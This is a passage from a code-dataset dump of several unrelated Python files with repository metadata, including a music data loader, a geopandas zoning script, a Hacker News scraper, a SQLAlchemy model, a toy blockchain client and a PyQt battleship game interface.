SongsDataset(self.songs_val, self.seq_len, split_label=self.split_label)\n\n if stage == \"test\" or stage is None:\n self.songs_test = get_maestro_song_notes(self.num_test_songs,\n skip=self.num_train_songs + self.num_val_songs)\n self.songs_test = SongsDataset(self.songs_test, self.seq_len, split_label=self.split_label)\n\n def train_dataloader(self):\n return DataLoader(\n self.songs_train,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n )\n\n def val_dataloader(self):\n return DataLoader(self.songs_val, batch_size=self.batch_size, num_workers=self.num_workers)\n\n def test_dataloader(self):\n return DataLoader(self.songs_test, batch_size=self.batch_size, num_workers=self.num_workers)\n\n\n","repo_name":"Getriax/AAI","sub_path":"songs_data.py","file_name":"songs_data.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36390460769","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 15 10:16:11 2019\n\n@author: MMann\n\"\"\"\n\nfrom shapely.geometry import Point\nimport pandas as pd\nimport geopandas as gp\nimport os\n \nos.chdir(r'C:/Users/mmann/Google Drive/HousingLife/Historic Designation/data/')\n#%%\ndef proj_and_area(file):\n file= file.to_crs({'init': 'epsg:26918'})\n file[\"area\"] = file['geometry'].area/ 10**6 #km/sqr \n return file\n \nafford = gp.read_file('./Affordable_Housing/Affordable_Housing_simple_clean.geojson')\nwater = gp.read_file('./Waterbodies/Waterbodies.shp')\nhd = gp.read_file('./Historic_Districts/Historic_Districts.geojson')\nzoning = gp.read_file('./Zoning_Regulations_of_2016/Zoning_Regulations_of_2016.geojson')\nsf = gp.read_file('./Zoning_Regulations_of_2016/R1_3.geojson')\n\n# find area developable - remove commercial, and other non res types\nzoning = zoning[~zoning['ZONING_LAB'].isin(['ARTS-1','ARTS-2','ARTS-3','ARTS-4','D-7','D-8','HE-1','HE-2','HE-3','HE-4','StE-11', \n 'StE-12', 'StE-13', 'StE-14', 'StE-15', 'StE-16', 'StE-17', 'StE-18', 'StE-19', 'StE-2', 'StE-3', \n 'StE-4', 'StE-5', 'StE-6', 'StE-7', 'StE-8', 'StE-9','WR-1','WR-2','WR-3','WR-4', \n 'WR-5','WR-6','WR-7','WR-8', 'CG-1','CG-2','CG-3','CG-4','CG-5','CG-6','CG-7', 'UNZONED'])]\n\navaiable = gp.overlay(zoning, water, 
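# how='difference' keeps only the parts of the first layer not covered
# by the second, so each successive overlay strips one more constraint.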
how='difference')\navaiable = gp.overlay(avaiable, hd, how='difference')\navaiable = gp.overlay(avaiable, sf, how='difference')\n\n \n# reproject and add area \nafford,water,hd,zoning= ( proj_and_area(item) for item in [afford,water,hd,zoning])\n\n#%%\n\navaiable.to_file('./Zoning_Regulations_of_2016/remaining_not_sf_hd_water_commercial.geojson', driver=\"GeoJSON\")\n","repo_name":"mmann1123/geo_python","sub_path":"Scripts/Basic Geopandas Operations - Area difference etc.py","file_name":"Basic Geopandas Operations - Area difference etc.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17248149013","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\nimport argparse\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\n\n\nclass Article:\n \"\"\"\n This is a class to create article objects.\n\n Attributes:\n title (str): The article's title\n url (str): The link to the article\n votes (int): The number of votes the article has\n \"\"\"\n\n def __init__(self, title, url, votes):\n self.title = title\n self.url = url\n self.votes = votes\n\n def __str__(self):\n return f\"\\n Title: {self.title}\\n URL: {self.url}\\n [{self.votes}\" \\\n \" votes]\"\n\n\ndef get_top_articles(url, threshold):\n \"\"\"\n Parse articles from page and return only those articles with votes \n greater than or equal to threshold\n \"\"\"\n res = requests.get(url)\n soup = BeautifulSoup(res.text, 'lxml')\n articles = soup(class_=\"athing\")\n top_articles = []\n\n # get the article's votes relative to where it is located in html\n # (article title and url is nested within .athing while votes are nested\n # within .athing's sibling, .subtext)\n if articles:\n for item in articles:\n votes = item.next_sibling.find(class_=\"score\")\n if votes:\n votes = int(votes.text.split()[0])\n if votes >= threshold:\n current_article = item.find(class_=\"storylink\")\n title = current_article.text\n url = current_article.get('href')\n top_articles.append(Article(title, url, votes))\n return top_articles\n\n\ndef print_articles_sorted(top_articles):\n \"\"\"Print articles in descending order by votes\"\"\"\n for i, item in enumerate(sorted(top_articles, key=lambda k: k.votes,\n reverse=True)):\n print(f\"{i + 1}. 
{item}\\n\")\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(\n description=\"Scrape top articles from Hacker News with at least n\"\n \" votes\")\n parser.add_argument(\n \"threshold\", help=\"The minimum number of votes that posts should\"\n \" have\", type=int)\n args = parser.parse_args()\n aggregate_articles = []\n\n print(\"Scraping...\\n\")\n\n for i in tqdm(range(1, 16)):\n url = f\"https://news.ycombinator.com/news?p={i}\"\n aggregate_articles += get_top_articles(url, args.threshold)\n\n print(\"\\nDone.\\n\")\n print_articles_sorted(aggregate_articles)\n","repo_name":"dga/hackernews_scraper","sub_path":"scrape_hackernews.py","file_name":"scrape_hackernews.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5740603546","text":"from sqlalchemy import Column, Integer, ForeignKey\nfrom sqlalchemy.orm import relationship\nfrom models.dbcontext import DbContext as db\n\nclass Grade(db.Base):\n \"\"\"\n model class (maps to grade table);\n associative entity between student and course tables\n \"\"\"\n __tablename__ = \"grade\"\n\n grade = Column(Integer)\n student_id = Column(Integer, ForeignKey(\"student.id\"), primary_key=True)\n student = relationship(\"Student\")\n course_id = Column(Integer, ForeignKey(\"course.id\"), primary_key=True)\n course = relationship(\"Course\")\n\n def __init__(self, grade, student_id, course_id):\n self.grade = grade\n self.student_id = student_id\n self.course_id = course_id\n \n @classmethod\n def get_all(cls, session):\n return session.query(cls).all()\n\n @property\n def serialize(self):\n \"\"\"\n needed to make Grade objects JSON serializable\n \"\"\"\n return {\n \"grade\": self.grade,\n \"student\": {\n \"id\": self.student_id,\n \"fname\": self.student.fname,\n \"lname\": self.student.lname,\n \"dob\": self.student.dob,\n \"grad_year\": self.student.grad_year,\n \"gpa\": self.student.gpa,\n \"occupation\": self.student.occupation.serialize\n },\n \"course\": {\n \"id\": self.course_id,\n \"course_name\": self.course.course_name,\n \"field\": self.course.field.serialize,\n \"faculty\": self.course.faculty.serialize,\n \"semester\": self.course.semester.serialize\n }\n }\n \n def __repr__(self):\n return f\"Grade({self.grade}, {self.student}, {self.course})\"\n","repo_name":"bybside/student-advisor","sub_path":"models/db/grade.py","file_name":"grade.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74487149228","text":"import argparse\n\n\ndef setup_argparse_and_return_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\nItemSubjector enables working main subject statements on items based on a\nheuristic matching the subject with the title of the main_subject_item.\n\nExample adding one Qid:\n'$ itemsubjector.py -a Q1234'\n\nExample adding one Qid and prepare a job sparql_items to be run non-interactively later:\n'$ itemsubjector.py -a Q1234 -p'\n\nExample working on all diseases:\n'$ itemsubjector.py --sparql \"SELECT ?main_subject_item WHERE {?main_subject_item wdt:P31 wd:Q12136. 
MINUS {?main_subject_item wdt:P1889 [].}}\"'\n \"\"\",\n )\n parser.add_argument(\n \"-a\",\n \"--add\",\n \"--qid-to-add\",\n nargs=\"+\",\n help=(\n \"List of QIDs or URLs to Q-items that \"\n \"are to be added as \"\n \"main subjects on scientific articles. \"\n \"Always add the most specific ones first. \"\n \"See the README for examples\"\n ),\n )\n parser.add_argument(\n \"-na\", \"--no-aliases\", action=\"store_true\", help=\"Turn off alias matching\"\n )\n parser.add_argument(\n \"-nc\",\n \"--no-confirmation\",\n action=\"store_false\",\n default=True,\n help=\"Turn off confirmation after displaying the search expressions, before running the queries.\",\n )\n parser.add_argument(\n \"-p\",\n \"--prepare-jobs\",\n action=\"store_true\",\n help=\"Prepare a job for later execution, e.g. in a job engine\",\n )\n parser.add_argument(\n \"-r\",\n \"--run-prepared-jobs\",\n action=\"store_true\",\n help=\"Run prepared jobs non-interactively\",\n )\n parser.add_argument(\n \"-rm\",\n \"--remove-prepared-jobs\",\n action=\"store_true\",\n help=\"Remove prepared jobs\",\n )\n # parser.add_argument(\n # \"-w\",\n # \"--limit-to-items-without-p921\",\n # action=\"store_true\",\n # help=\"Limit matching to scientific articles without P921 main subject\",\n # )\n parser.add_argument(\n \"-su\",\n \"--show-search-urls\",\n action=\"store_true\",\n help=\"Show an extra column in the table of search strings with links\",\n )\n parser.add_argument(\n \"-iu\",\n \"--show-main_subject_item-urls\",\n action=\"store_true\",\n help=\"Show an extra column in the table of items with links\",\n )\n parser.add_argument(\n \"--sparql\",\n nargs=\"?\",\n help=\"Work on main subject items returned by this SPARQL query.\\n\"\n 'Note: \"?main_subject_item\" has to be selected for it to work, see the example above.\\n'\n \"Note: MINUS {?main_subject_item wdt:P1889 [].} must be present in the query to avoid false positives.\",\n )\n parser.add_argument(\n \"--debug-sparql\",\n action=\"store_true\",\n help=\"Enable debugging of SPARQL queries.\",\n default=False,\n )\n parser.add_argument(\n \"--no-ask-match-more-limit\",\n \"--limit\",\n nargs=\"?\",\n type=int,\n help=\"When working on SPARQL queries of e.g. 
galaxies, match more until this many matches are in the job sparql_items\",\n )\n return parser.parse_args()\n","repo_name":"dpriskorn/ItemSubjector","sub_path":"src/helpers/argparse_setup.py","file_name":"argparse_setup.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"37808951497","text":"import random\nimport json\n\ndef randomization_test(l_target, l_base, met):\n total_test = 5000\n diff = sum(l_target) / float(len(l_target)) - sum(l_base) / float(len(l_base))\n cnt = 0.0\n for i in range(total_test):\n l_a, l_b = random_swap(l_target, l_base)\n this_diff = sum(l_a) / float(len(l_a)) - sum(l_b) / float(len(l_b))\n if this_diff > diff:\n cnt += 1.0\n p = cnt / float(total_test)\n print(\"Metrics: \", met, \"Our: \", sum(l_target) / float(len(l_target)), \"KCM: \", sum(l_base) / float(len(l_base)), \"Diff: \", diff, \"P-Value\", p)\n return p\n\n\ndef random_swap(l_target, l_base):\n l_a = list(l_target)\n l_b = list(l_base)\n\n for i in range(len(l_target)):\n if random.randint(0, 1):\n l_a[i], l_b[i] = l_b[i],l_a[i]\n return l_a, l_b\n\ndef cal_sig_old_new_format():\n f1 = open('/shared/djjindal/ASD/data/full/preds/m1/base_supfull_U.json', 'r')\n f2 = open('/shared/djjindal/ASD/data/full/preds/m2/base_frame2_supfull_U.json', 'r')\n l_target, l_base = dict(), dict()\n i = 0\n line = f1.readline()\n model_dict = json.loads(f2.readline())\n metric_list = [\"p@01\", \"p@05\", \"p@10\", \"p@20\", \"up@01\", \"up@05\", \"up@10\", \"up@20\", \"ur@01\", \"ur@05\",\"ur@10\", \"ur@20\", \"nr@01\", \"nr@05\", \"nr@10\", \"nr@20\"]\n for met in metric_list:\n l_target[met] = []\n l_base[met] = []\n \n while(line):\n base_json = json.loads(line)\n key = base_json['docno']\n if key in model_dict:\n model_json = model_dict[key]\n for met in metric_list:\n l_target[met].append(model_json[met])\n l_base[met].append(base_json[\"eval\"][met])\n i+=1\n line = f1.readline()\n print(\"Running randomization_test on \", i, \"samples\")\n for met in metric_list:\n print(met, sum(l_base[met]) / float(len(l_base[met])))\n print(met, sum(l_target[met]) / float(len(l_target[met])))\n if( sum(l_target[met]) / float(len(l_target[met])) > sum(l_base[met]) / float(len(l_base[met]))):\n pval = randomization_test(l_target[met], l_base[met], met)\n \n\ndef cal_sig_new_format():\n f1 = open('/shared/djjindal/ASD/data/full/preds/m3/base_frame_sl_unem_supfull_U.json', 'r')\n f2 = open('/shared/djjindal/ASD/data/full/preds/m4/base_frame_sl_nem_ps_supfull_U.json', 'r')\n l_target, l_base = dict(), dict()\n i = 0\n model1_dict = json.loads(f1.readline())\n model2_dict = json.loads(f2.readline())\n metric_list = [\"up@01\", \"up@05\", \"up@10\",\"ur@01\", \"ur@05\",\"ur@10\"]\n for met in metric_list:\n l_target[met] = []\n l_base[met] = []\n \n for key in model1_dict:\n try:\n base_json = model1_dict[key]\n model_json = model2_dict[key]\n for met in metric_list:\n l_target[met].append(model_json[met])\n l_base[met].append(base_json[met])\n except:\n print(\"Error \", key)\n print(\"Running randomization_test on \", len(l_base[met]), \"samples\")\n for met in metric_list:\n print(met, sum(l_base[met]) / float(len(l_base[met])))\n print(met, sum(l_target[met]) / float(len(l_target[met])))\n if( sum(l_target[met]) / float(len(l_target[met])) > sum(l_base[met]) / float(len(l_base[met]))):\n pval = randomization_test(l_target[met], l_base[met], met)\n \ncal_sig_new_format() \n \n 
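# A minimal, hypothetical smoke test for randomization_test (not part of the
# original pipeline): with two clearly separated score lists the returned
# p-value should be near zero.
def _smoke_test_randomization():
    random.seed(0)
    better = [0.8 + random.random() * 0.05 for _ in range(50)]
    worse = [0.5 + random.random() * 0.05 for _ in range(50)]
    assert randomization_test(better, worse, 'demo-metric') < 0.05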
","repo_name":"CogComp/Salient-Event-Detection","sub_path":"src/eval/significance.py","file_name":"significance.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"10018351677","text":"import Client\nimport Transaction\nimport Block\nimport Miner\nfrom os import system, name\n\n#As a First, Initialize all the Nodes and add them to a dictionary\nprint(\"Initializing all the Nodes ... \")\nuser1inst = Client.Client()\nuser2inst = Client.Client()\nuser3inst = Client.Client()\nuser4inst = Client.Client()\nuser5inst = Client.Client()\nnodeMap = {\"user1\":user1inst, \"user2\":user2inst, \"user3\":user3inst, \"user4\":user4inst, \"user5\":user5inst}\nprint('All the Nodes initialized')\n\n#Public Transaction Queue - A Global List. Each newly created Transaction will be appended here\nglobal_chain_transactions = []\n\n#Public List of Blocks - To be chained in the actual Blockchain\nglobal_GavCoins = []\n\n#Global variable as each block needs the value of the previous block's hash\nglobal_last_block_hash = \"\"\n\n#To track number of transactions mined - transaction index\nglobal_last_transaction_index = 0\n\n#Method to get the User Choice as input\ndef get_user_choice():\n\tuser_input = input('Your Choice: ')\n\treturn user_input\n\n#Method to Add a New Transaction. After the Transaction, there is a need to sign the transaction, so will call the sign_transaction method.\n#This will return the signature in printable format, which can be persisted for reference.\ndef add_new_transaction():\n\tclientInstance = Client.Client()\n\tsender = input('Enter the name of the sender: ')\n\trecipient = input('Enter the name of the receiver: ')\n\tnosCoin = input(\"Enter the number of Coins to be Transferred: \")\n\t#nodeList = clientInstance.get_nodes()\n\t#print(nodeList)\n\t#Checks if the entered values exists as nodes\n\tif (sender in nodeMap) and (recipient in nodeMap):\n\t\t#print(\"Nodes are existing\")\n\t\ttransactionInstance = Transaction.Transaction(nodeMap[sender],nodeMap[recipient].identity,nosCoin)\n\t\ttransactionInstance.sign_transaction()\n\t\tglobal_chain_transactions.append(transactionInstance)\n\telse:\n\t\tprint(\"Nodes are not existing\") \n\n#Logic to clear the console for clean inputs\ndef clear_screen():\n\t#OS Name for Ubuntu is posix - OS NAME check\n\tif name == 'posix':\n\t\t_ = system('clear')\n\telif name == 'nt':\n\t\t#For Windows\n\t\t_ = system('cls')\n\t#print(\"Name is: \", name)\n\n#Menu Option for the Blockchain Users\nwaiting_for_input = True\nwhile waiting_for_input:\n\tprint(\"Please Choose from the below options: \")\n\tprint(\"1 - To Add a New Transaction\")\n\tprint(\"2 - See the Transactions Added\")\n\tprint(\"3 - Start a Block Chain\")\n\tprint(\"4 - Add Blocks to the Blockchain\")\n\tprint(\"5 - To see all the Blocks in the Blockchain\")\n\tprint(\"6 - QUIT\")\n\tuser_choice = get_user_choice()\n\tprint(\"USER CHOICE: \", user_choice)\n\tif user_choice == '1':\n\t\tprint(\"User Selected 1\")\n\t\tclear_screen()\n\t\tadd_new_transaction()\n\t\n\telif user_choice == '2':\n\t\tclear_screen()\n\t\tprint(\"The total number of transactions added: \", len(global_chain_transactions))\n\t\tprint(\"The transactions are: \")\n\t\ttrans = Transaction.Transaction()\n\t\ttrans.display_transaction(global_chain_transactions)\n\t\n\telif user_choice == '3':\n\t\tclear_screen()\n\t\tprint(\"Starting the Blockchain. 
This will start a chain afresh with a Genesis Block\")\n\t\tt0 = Transaction.Transaction(\"Genesis\",user1inst.identity,500)\n\t\tblock0 = Block.Block()\n\t\t#Initializing the block constituents (previous block and nonce) as 'None' as this is the first block of the chain\n\t\tblock0.previous_block_hash = None\n\t\tblock0.Nonce = None\n\t\tblock0.verified_transactions.append(t0)\n\t\t\n\t\t#Now, hash the Genesis block and store the value in the global variable\n\t\thashVal = hash(block0)\n\t\tglobal_last_block_hash = hashVal\n\t\tprint(\"Adding the Genesis Block to the Blockchain\")\n\t\tglobal_GavCoins.append(block0)\n\t\n\telif user_choice == '4':\n\t\tclear_screen()\n\t\tblock = Block.Block()\n\t\tminer = Miner.Miner()\n\t\tfor i in range(3):\n\t\t\ttemp_transaction = global_chain_transactions[global_last_transaction_index]\n\t\t\t#TBD - VALIDATE TRANSACTION\n\t\t\t#TBD - BELOW TO BE Added only if the transaction is valid\n\t\t\tblock.verified_transactions.append(temp_transaction)\n\t\t\tglobal_last_transaction_index += 1\n\t\t\n\t\tblock.previous_block_hash = global_last_block_hash\n\t\tblock.Nonce = miner.mine(block, 2)\n\t\tdigest = hash(block)\n\t\tglobal_GavCoins.append(block)\n\t\tglobal_last_block_hash = digest\n\t\t\n\t\n\telif user_choice == '5':\n\t\tclear_screen()\n\t\tblockInstance = Block.Block()\n\t\tblockInstance.showBlockchain(global_GavCoins)\n\t\n\telif user_choice == '6':\n\t\twaiting_for_input = False\n\t\n\telse:\n\t\tprint(\"Invalid Input. Please choose from the options suggested\")\n #TODO: add proof of work and give all miners a chance to mine blocks.\n #TODO: serve the menu options over a browser, opening a new window per session so multiple nodes can run in different sessions","repo_name":"GavinAren/Nea_blockchain","sub_path":"BlockChainClient.py","file_name":"BlockChainClient.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43095148508","text":"\"\"\"Constants for the gehome integration.\"\"\"\nfrom gehomesdk.clients.const import LOGIN_URL\n\nDOMAIN = \"ge_home\"\n\nEVENT_ALL_APPLIANCES_READY = 'all_appliances_ready'\n\nUPDATE_INTERVAL = 30\nASYNC_TIMEOUT = 30\nMIN_RETRY_DELAY = 15\nMAX_RETRY_DELAY = 1800\nRETRY_OFFLINE_COUNT = 5\n\nSERVICE_SET_TIMER = \"set_timer\"\nSERVICE_CLEAR_TIMER = \"clear_timer\"\nSERVICE_SET_INT_VALUE = \"set_int_value\"","repo_name":"mfrericks/GE-Home","sub_path":"custom_components/ge_home/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"21599463578","text":"#!/bin/python\n\n'''\nAuthor: Sourav Sarkar\nDate: November 27, 2021\nEmail: ssarkar1@ualberta.ca\nDescription: This script takes the h5 file and scales its features back to their\n\toriginal range using the mean and standard deviation for all the respective feature values\n'''\nnode_features = [\n \"ResidualTime\", \"PhotonTrackLength\", \"ChargeFirstPulse\",\n \"TrackDOMDistance\", \"TotalCharge\", \"TimeMaxPulse\",\n \"ChargeMaxPulse\", \"DeltaTimeStd\"\n ]\n\ngraph_features = [\n \"InitialTrackIntensity\", \"FinalTrackIntensity\",\n \"TrackSmoothness\", \"EventCharge\", \"EventTracklength\"\n ]\n\nimport h5py as h5\nimport numpy as np\n\n\ngetfileloc = \"/data/user/ssarkar/TridentProduction/reconstruction/trident_gnn/dataset/resampled_dataset_8/dataset_split/\"\ngfile = h5.File(getfileloc+\"train.h5\",\"r\")\nnscale = gfile[\"NodeScaleInfo\"]\nnmean= nscale[\"MeanValue\"]\nnstd 
= nscale[\"StdValue\"]\ngscale = gfile[\"GraphScaleInfo\"]\ngmean = gscale[\"MeanValue\"]\ngstd = gscale[\"StdValue\"]\n\nfileloc=\"/data/user/ssarkar/TridentProduction/reconstruction/trident_gnn/dataset/cc_dataset_10/\"\nf_train = h5.File(fileloc+\"merged_numu_trident.h5\", \"a\")\n\nfor i,key in enumerate(node_features):\n\tstdval = nstd[:][i]\n\tmeanval= nmean[:][i]\n\tprint (stdval,meanval)\n\tf_train[key][:] = (f_train[key][:]*stdval)+meanval\n\tminv = np.min(f_train[key][:])\n\tmaxv = np.max(f_train[key][:])\n\tprint (f\"Post scaling range: {key} : min:{minv}, max:{maxv}\")\n\nfor i,key in enumerate(graph_features):\n\tstdval = gstd[:][i]\n\tmeanval = gmean[:][i]\n\n\tprint (stdval,meanval)\n\tf_train[key][:] = (f_train[key][:]*stdval)+meanval\n\n\tminv = np.min(f_train[key][:])\n\tmaxv = np.max(f_train[key][:])\n\tprint (f\"Post scaling range: {key} : min:{minv}, max:{maxv}\")\n\n\n#g11 = f_train.create_group('NodeScaleInfo')\n#g12 = f_train.create_group('GraphScaleInfo')\n\n\n\nf_train.close()\n\n","repo_name":"ssarkarbht/TridentGNNClassifier","sub_path":"feature_modules/feature_scaleback.py","file_name":"feature_scaleback.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14926394032","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont, QPixmap, QIcon\nfrom PyQt5.QtWidgets import *\n\nfrom Interface.Slots import Slots\nfrom Interface.GraphicsScene import GraphicsScene\n\n\nclass MainWindow():\n def __init__(self):\n self.central_widget = QWidget()\n self.main_grid_layout = QGridLayout(self.central_widget)\n self.slots = Slots(self)\n\n self.scene_gamer = GraphicsScene()\n self.scene_comp = GraphicsScene()\n self.view_gamer = QGraphicsView(self.scene_gamer)\n self.view_comp = QGraphicsView(self.scene_comp)\n\n self.protocol = QTextEdit()\n\n self.interactive = QGroupBox(self.central_widget)\n self.lbl_ships_set = QLabel(self.interactive)\n self.start_game = QCommandLinkButton(self.interactive)\n self.auto = QRadioButton(self.interactive)\n self.hand = QRadioButton(self.interactive)\n self.set_ships = QCommandLinkButton(self.interactive)\n self.up = QLabel(self.interactive)\n self.down = QLabel(self.interactive)\n self.left = QLabel(self.interactive)\n self.right = QLabel(self.interactive)\n self.rotate = QLabel(self.interactive)\n self.set_lbl = QLabel(self.interactive)\n\n self.ships = QGroupBox(self.central_widget)\n self.count_g = [QLabel(self.ships) for i in range(4)]\n self.count_c = [QLabel(self.ships) for i in range(4)]\n\n self.font = QFont()\n self.font.setPixelSize(18)\n\n self.initUi()\n\n def initUi(self):\n self.central_widget.setFixedSize(1050, 580)\n self.central_widget.setWindowIcon(QIcon(\"icon.ico\"))\n self.central_widget.setWindowTitle(\"Морской бой\")\n self.protocol.setReadOnly(True)\n self.create_fields()\n self.main_grid_layout.addWidget(self.protocol, 1, 2, 16, 1)\n self.create_footer()\n self.create_interactive()\n self.stat_ships()\n self.connection()\n self.central_widget.show()\n\n def create_footer(self):\n name_gamer = QGroupBox(self.central_widget)\n name_comp = QGroupBox(self.central_widget)\n name_protocol = QGroupBox(self.central_widget)\n\n lbl_gamer = QLabel(name_gamer)\n lbl_comp = QLabel(name_comp)\n lbl_protocol = QLabel(name_protocol)\n\n lbl_gamer.setFixedWidth(350)\n lbl_gamer.setText(\"Поле Игрока\")\n lbl_gamer.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_gamer.setFont(self.font)\n lbl_comp.setFixedWidth(350)\n 
lbl_comp.setText(\"Поле Противника\")\n lbl_comp.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_comp.setFont(self.font)\n lbl_protocol.setFixedWidth(300)\n lbl_protocol.setText(\"Протокол\")\n lbl_protocol.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_protocol.setFont(self.font)\n\n self.main_grid_layout.addWidget(name_gamer, 0, 0, 1, 1)\n self.main_grid_layout.addWidget(name_comp, 0, 1, 1, 1)\n self.main_grid_layout.addWidget(name_protocol, 0, 2, 1, 1)\n\n def create_fields(self):\n self.scene_gamer.setSceneRect(0, 0, 290, 290)\n self.scene_comp.setSceneRect(0, 0, 290, 290)\n self.view_gamer.setFixedSize(292, 292)\n self.view_comp.setFixedSize(292, 292)\n\n field_gamer = QGroupBox(self.central_widget)\n field_comp = QGroupBox(self.central_widget)\n\n lbl_num_gamer = QLabel()\n lbl_char_gamer = QLabel()\n lbl_num_gamer.setText(\"1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n10\")\n lbl_char_gamer.setText(\"  А Б В Г Д   Е Ё   Ж   З   И\")\n\n fontH = QFont()\n fontH.setPixelSize(20)\n fontV = QFont()\n fontV.setPixelSize(24)\n\n lbl_num_gamer.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_char_gamer.setFont(fontH)\n lbl_num_gamer.setFont(fontV)\n\n field_gamer.setFixedSize(350, 350)\n lay_gamer = QGridLayout(field_gamer)\n\n lay_gamer.addWidget(lbl_char_gamer, 0, 1, 1, 8)\n lay_gamer.addWidget(lbl_num_gamer, 1, 0, 8, 1)\n lay_gamer.addWidget(self.view_gamer, 1, 1, 8, 8)\n\n field_comp.setFixedSize(350, 350)\n lay_comp = QGridLayout(field_comp)\n\n lbl_num_comp = QLabel()\n lbl_char_comp = QLabel()\n lbl_num_comp.setText(\"1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n10\")\n lbl_char_comp.setText(\"  А Б В Г Д   Е Ё   Ж   З   И\")\n lbl_num_comp.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_char_comp.setFont(fontH)\n lbl_num_comp.setFont(fontV)\n\n lay_comp.addWidget(lbl_char_comp, 0, 1, 1, 8)\n lay_comp.addWidget(lbl_num_comp, 1, 0, 8, 1)\n lay_comp.addWidget(self.view_comp, 1, 1, 8, 8)\n\n self.main_grid_layout.addWidget(field_gamer, 1, 0, 12, 1)\n self.main_grid_layout.addWidget(field_comp, 1, 1, 12, 1)\n\n def create_interactive(self):\n lay = QGridLayout(self.interactive)\n self.start_game.setFixedHeight(50)\n self.lbl_ships_set.setText(\"Установить корабли\")\n self.lbl_ships_set.setAlignment(Qt.AlignHCenter | Qt.AlignTop)\n self.auto.setText(\"Автоматически\")\n self.auto.setChecked(True)\n self.hand.setText(\"Вручную\")\n self.set_ships.setText(\"Начать установку\")\n\n self.auto.setFont(self.font)\n self.hand.setFont(self.font)\n self.lbl_ships_set.setFont(self.font)\n\n lay.addWidget(self.lbl_ships_set, 0, 0, 1, 2)\n lay.addWidget(self.auto, 1, 0, 1, 1)\n lay.addWidget(self.hand, 1, 1, 1, 1)\n lay.addWidget(self.set_ships, 2, 0, 1, 2)\n\n self.start_game.setText(\"Начать новую игру\")\n lay.addWidget(self.start_game, 1, 0, 1, 2)\n self.start_game.setVisible(False)\n\n self.up.setText(\"↑ - Вверх\")\n self.down.setText(\"↓ - Вниз\")\n self.left.setText(\"← - Влево\")\n self.right.setText(\"→ - Вправо\")\n self.rotate.setText(\"ctrl - Повернуть\")\n self.set_lbl.setText(\"space - Установить\")\n self.up.setFont(self.font)\n self.down.setFont(self.font)\n self.left.setFont(self.font)\n self.right.setFont(self.font)\n self.rotate.setFont(self.font)\n self.set_lbl.setFont(self.font)\n self.up.setVisible(False)\n self.down.setVisible(False)\n self.left.setVisible(False)\n self.right.setVisible(False)\n self.rotate.setVisible(False)\n self.set_lbl.setVisible(False)\n lay.addWidget(self.up, 0, 0, 1, 1)\n lay.addWidget(self.down, 0, 1, 1, 1)\n lay.addWidget(self.left, 1, 0, 1, 1)\n 
lay.addWidget(self.right, 1, 1, 1, 1)\n lay.addWidget(self.rotate, 2, 0, 1, 1)\n lay.addWidget(self.set_lbl, 2, 1, 1, 1)\n\n self.main_grid_layout.addWidget(self.interactive, 13, 0, 4, 1)\n\n def stat_ships(self):\n for i in range(1, 5):\n self.count_g[i - 1].setText(f\" - {5 - i}\")\n self.count_g[i - 1].setFont(self.font)\n self.count_c[i - 1].setText(f\" - {5 - i}\")\n self.count_c[i - 1].setFont(self.font)\n\n lay = QGridLayout(self.ships)\n title = QLabel(self.ships)\n title.setText(\"Корабли\")\n title.setFont(self.font)\n title.setAlignment(Qt.AlignHCenter | Qt.AlignTop)\n\n ship4 = QPixmap()\n ship4.load(\"4-палубник.png\")\n ship4g = QLabel(self.ships)\n ship4g.setPixmap(ship4)\n ship4c = QLabel(self.ships)\n ship4c.setPixmap(ship4)\n\n ship3 = QPixmap()\n ship3.load(\"3-палубник.png\")\n ship3g = QLabel(self.ships)\n ship3g.setPixmap(ship3)\n ship3c = QLabel(self.ships)\n ship3c.setPixmap(ship3)\n\n ship2 = QPixmap()\n ship2.load(\"2-палубник.png\")\n ship2g = QLabel(self.ships)\n ship2g.setPixmap(ship2)\n ship2c = QLabel(self.ships)\n ship2c.setPixmap(ship2)\n\n ship1 = QPixmap()\n ship1.load(\"1-палубник.png\")\n ship1g = QLabel(self.ships)\n ship1g.setPixmap(ship1)\n ship1c = QLabel(self.ships)\n ship1c.setPixmap(ship1)\n\n lay.addWidget(title, 0, 0, 1, 4)\n lay.addWidget(ship4g, 1, 0, 1, 1)\n lay.addWidget(ship4c, 1, 2, 1, 1)\n lay.addWidget(self.count_g[3], 1, 1, 1, 1)\n lay.addWidget(self.count_c[3], 